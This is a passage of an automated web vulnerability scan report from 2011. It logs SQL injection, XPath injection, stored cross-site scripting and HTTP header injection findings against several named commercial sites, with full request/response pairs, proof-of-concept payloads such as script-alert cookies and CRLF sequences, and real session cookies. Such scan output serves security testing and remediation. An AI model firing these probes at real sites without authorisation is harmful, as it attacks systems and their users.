Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
xserver: www616
Content-Length: 0
Content-Type: text/html


1.4. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s85063178692944 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s85063178692944

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/proflodevelopment/1/H.22.1/s85063178692944 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
xserver: www619
Content-Length: 0
Content-Type: text/html


2. XPath injection  previous  next
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry'/topics HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:36 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

2.2. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry/topics' HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:37 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

3. Cross-site scripting (stored)  previous  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie submitted to the URL /v1/beacons/initialize is copied into the HTML document as plain text between tags at the URL /v1/beacons/initialize. The payload 4a902<script>alert(1)</script>1bb5b69e467 was submitted in the vaguid cookie. This input was returned unmodified in a subsequent request for the URL /v1/beacons/initialize.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467

Request 2

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response 2

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467');

3.2. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a8502<script>alert(1)</script>e55be4f7c60 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60

Request 2

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:52 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

4. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://m.xp1.ru4.com/activity [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload f90fe%0d%0a7e63346a2ba was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=http%3A%2F%2Ftag.admeld.com%2Fmatch%3F%26admeld_adprovider_id=303%26external_user_id=%7euk%7ef90fe%0d%0a7e63346a2ba&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:56:34 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Location: http://tag.admeld.com/match?&admeld_adprovider_id=303&external_user_id=BO-00000000670935830f90fe
7e63346a2ba
&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
X-Cnection: close


4.2. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 5acac%0d%0a221f811ccdb was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f925acac%0d%0a221f811ccdb; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:22:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:07:33 GMT; domain=.at.atwola.com
